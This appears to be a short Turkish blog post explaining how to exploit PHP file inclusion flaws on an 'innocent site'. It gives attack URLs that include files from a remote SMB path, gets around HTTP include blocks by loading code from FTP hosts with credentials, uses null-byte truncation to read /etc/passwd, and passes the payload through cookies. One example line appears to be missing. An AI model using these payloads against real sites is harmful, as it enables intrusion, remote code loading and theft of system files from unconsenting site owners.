PHP5 kullananlar sistemlerde.
Ağ üzerinden dosya dahil etmede mevcuttur.
Örnek olarak:
http://masumsite/index.php?dosyacik=\\192.168.1.1\dosyamiz.txt
Şeklinde dosya dahili yapabilmekteyiz.
Bu arada SecurePHP kullanan sistemlerde bilindiği üzere HTTP sorgulu sayfalar include edilememekte.
Bunu aşmanın en kolay yolu ise.
gibi
FTP lokasyonundan dosyaları include etmektir.Bu örnekde basit olarak
anon bir hosttan dosya dahili mevcut.Login ile dosya dahili için. -> ftp://kullanici:sifre@host.com tarzında olmalı FTP isteğimiz.
Ayrıca
eğer php.ini de magic_quotes_gpc değeri off olarak ayarlı ise 0x00 yani
boş karakter dediğimiz karakter ile lokal dosyalar dahili daha kolay
olmaktadır.
Bunun ile kod içinde
include($sayfa.".php");
gibi bir satır mevcutsa .php den sonraki kısım okunmayacaktır.
Örnek
http://masumsite/index.php?dosyacik=/etc/passwd%00
Ayrıca
eğer değer $_GET , $_POST gibi variablelar ile belirtilmiyorsa cookie
olarakda normal cookie değerleri sayfacik=dosya adresi gibi sisteme
yollanabilir. 🎯
Yorum Gönder